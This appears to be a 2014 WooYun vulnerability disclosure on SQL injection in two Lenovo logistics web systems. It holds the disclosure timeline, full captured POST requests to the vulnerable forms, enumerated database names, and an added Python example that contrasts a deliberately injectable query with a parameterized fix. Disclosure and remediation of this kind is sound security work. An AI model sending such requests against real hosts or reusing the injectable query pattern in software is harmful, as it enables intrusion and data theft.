
Vulnerability summary

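Bug ID: wooyun-2014-048459

Title: Multiple overseas Lenovo systems vulnerable to SQL injection leading to information disclosure

Vendor: Lenovo

Author: Mr.leo

Submitted: 2014-01-10 12:02

Fixed: 2014-02-24 12:03

Publicly disclosed: 2014-02-24 12:03

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]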


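Vulnerability details

Disclosure status:

2014-01-10: Details sent to the vendor; awaiting vendor action
2014-01-13: Vendor confirmed; details visible to the vendor only
2014-01-23: Details opened to core white hats and experts in related fields
2014-02-02: Details opened to regular white hats
2014-02-12: Details opened to trainee white hats
2014-02-24: Details opened to the public

Brief description:

Multiple overseas Lenovo systems are vulnerable to SQL injection that leads to information disclosure. Several systems are involved, so hopefully this no longer counts as a "small vendor".

Detailed description:

Sites:
http://lis.lenovo.com/LISV2/ Logistics Information System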


http://lis.lenovo.com/RTS/ RTS tracking system


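The injection parameter is the same as in this earlier report: "WooYun: An overseas Lenovo system is vulnerable to SQL injection leading to information disclosure". Because multiple systems are involved, the vendor should audit the whole site to check whether any other subsystems have been missed.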

Request to the RTS system (forgetpwd.aspx):

POST http://lis.lenovo.com/RTS/forgetpwd.aspx HTTP/1.1
Host: lis.lenovo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://lis.lenovo.com/RTS/forgetpwd.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1095

ToolkitScriptManager1_HiddenField=%3B%3BAjaxControlToolkit%2C+Version%3D3.5.40412.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D28f01b0e84b6d53e%3Aen-US%3A1547e793-5b7e-48fe-8490-03a375b13a33%3Ade1feab2%3Af9cec9bc%3Aa67c2700%3Af2c8e708%3A8613aea7%3A3202a5a2%3Aab09e3fe%3A87104b7c%3Abe6fb298%3A720a52bf%3A589eaa30%3A698129cf%3Ae148b24b&__EVENTTARGET=btnProceed&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTAzODU1MjA5MQ9kFgICAw9kFgYCAQ8WAh4Fc3R5bGUFS2JhY2tncm91bmQtaW1hZ2U6dXJsKEltYWdlcy9SVFNfQmFubmVyXzkwMHg2MC5wbmcpO2hlaWdodDo2MHB4O3dpZHRoOjkwMHB4O2QCCw9kFgICAw8PFgIeBFRleHRkZGQCDQ8PFgIfAQUSIExFTk9WTyAtIFJUUyAyMDE0ZGRka9mr9YhGZYnk7Hkrn5U7Ioursgc%3D&__PREVIOUSPAGE=u9NeTchv2xiGhUWqAqY5Rfh-p6TsnKBCrgMFzXKfR0t07ShY7hUJlmma2elUYb0qvexCeXJXXSF3to0Apg9_Qrb3xck1&__EVENTVALIDATION=%2FwEWDgLRg6%2BjCQLQr4CuCgLjh8%2BzAgK9o7eoAQL7g77nDALn6oHDDAKG9P%2FCDAKUsvdnApTlme4OAo%2BfjvwCAvvjkIIIAruTnMMMAt7u54sIApP4%2BZoIqKrh2EWMzkkTXiqcyH1VtbSdECk%3D&txt_mailid=123%40lenovo.com&ValidatorCalloutExtender4_ClientState=&ValidatorCalloutExtender5_ClientState=&cmb_User_Type=CUSTOMER&ValidatorCalloutExtender8_ClientState=

Request to the LISV2 system:

POST http://lis.lenovo.com/LISV2/ HTTP/1.1
Host: lis.lenovo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://lis.lenovo.com/LISV2/
Cookie: ASP.NET_SessionId=z4lqclmhx42ljprmfqwm1dpe
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 908

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJOTIyMTc3ODA3D2QWAgIDD2QWBAIZDw8WAh4EVGV4dGVkZAIdDw8WAh8ABawBIExJUyAtICZjb3B5OyAyMDE0IExlbm92by4gQWxsIHJpZ2h0cyByZXNlcnZlZC4gfCA8YSBocmVmPSdodHRwOi8vd3d3Lmxlbm92by5jb20vbGVnYWwvaW4vZW4vJz5UZXJtcyBvZiB1c2U8L2E%2BIHwgPGEgaHJlZj0naHR0cDovL3d3dy5sZW5vdm8uY29tL3ByaXZhY3kvaW4vZW4vJz5Qcml2YWN5PC9hPmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQpDaGtTYXZlUHdkBQxjbG9zZURDUG9wdXBIEr%2F3U6mkHfQ0ajOYsF2X%2BdK%2FBeQrg5N9c7c%2F2%2FsPRg%3D%3D&__EVENTVALIDATION=%2FwEWDQK0pMqXCwKl1bKzCQKp2%2BqIAwKd%2B7qdDgLCyp3HCQLCgr8xAoLch8sJAr2jt6gBArnDi8QFAvuDvucMAufqgcMMAob0%2F8IMAt7u54sIXf42ZfGeGzLm1WECRtk0wKQIw6JuJ%2F73iT1J3pFrE7k%3D&txtUserName=&RF_UID_ValidatorCalloutExtender_ClientState=&txtPwd=&RF_PWD_ValidatorCalloutExtender_ClientState=&txt_mailid=123%40lenovo.com&ValidatorCalloutExtender4_ClientState=&ValidatorCalloutExtender5_ClientState=&btnProceed=Submit

Output:

current user: 'lisuser'
current database: 'Lenovo-LIS-India'
available databases [20]:
[*] Lenovo-B2B-ANZ
[*] Lenovo-B2B-Asean
[*] Lenovo-B2B-India
[*] Lenovo-Claims-India
[*] Lenovo-CRM-ANZ
[*] Lenovo-CRM-Asean
[*] Lenovo-Crm-India
[*] Lenovo-DISK11-India
[*] Lenovo-GSC-India
[*] Lenovo-GSC-India-VAS
[*] Lenovo-LIS-India
[*] Lenovo-Marketing-India
[*] Lenovo-REL-Pricing-India
[*] Lenovo-SMB-Pricing-India
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: [Lenovo-LIS-India]
[184 tables]


Proof of vulnerability:

Already demonstrated above.

Remediation:

Filter the parameters in each of the affected subsystems.
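
One way to apply this fix so that it holds on every subsystem is to validate each request value and bind it as a query parameter instead of splicing it into SQL text. The following is an added example, not code from the report or from the vendor: the table, column and function names, the mail-ID pattern and the user-type allow-list are assumptions, and in-memory SQLite stands in for the SQL Server backend.

```python
import re
import sqlite3

# Constructed allow-list; CUSTOMER is the cmb_User_Type value seen in the captured request.
ALLOWED_USER_TYPES = {"CUSTOMER"}
# Conservative mail-ID shape check (assumption, not the vendor's rule).
MAIL_RE = re.compile(r"[A-Za-z0-9.!#$%&'*+/=?^_`{|}~-]{1,64}@[A-Za-z0-9.-]{1,255}")


def make_db():
    """Constructed stand-in for the table behind the forgot-password form."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE app_user (mail_id TEXT PRIMARY KEY, user_type TEXT)")
    db.executemany(
        "INSERT INTO app_user VALUES (?, ?)",
        [("alice@example.com", "CUSTOMER"), ("o'brien@example.com", "CUSTOMER")],
    )
    return db


def lookup_concatenated(db, mail_id, user_type):
    """'Before' form: request values become part of the SQL text."""
    sql = ("SELECT mail_id FROM app_user WHERE mail_id = '" + mail_id
           + "' AND user_type = '" + user_type + "'")
    return db.execute(sql).fetchone()


def lookup_parameterized(db, mail_id, user_type):
    """Hardened form: validate, then bind values so they are only ever data."""
    if user_type not in ALLOWED_USER_TYPES:
        raise ValueError("unexpected user type")
    if not MAIL_RE.fullmatch(mail_id):
        return None
    sql = "SELECT mail_id FROM app_user WHERE mail_id = ? AND user_type = ?"
    return db.execute(sql, (mail_id, user_type)).fetchone()


def concatenation_breaks(db, mail_id):
    """True when a value changes the statement's structure instead of matching a row."""
    try:
        lookup_concatenated(db, mail_id, "CUSTOMER")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    legit = "o'brien@example.com"  # valid address containing an apostrophe
    print(concatenation_breaks(db, legit))                # True
    print(lookup_parameterized(db, legit, "CUSTOMER"))    # ("o'brien@example.com",)
```

The same binding pattern is available in ADO.NET through `SqlCommand.Parameters`, which is what an ASP.NET page such as forgetpwd.aspx would use.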

Copyright notice: when reposting, please credit the source: Mr.leo@乌云 (WooYun)


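Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2014-01-13 13:56

Vendor reply:

Thank you for supporting Lenovo's information security work. We will fix the vulnerability as soon as possible.

Latest status:

None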

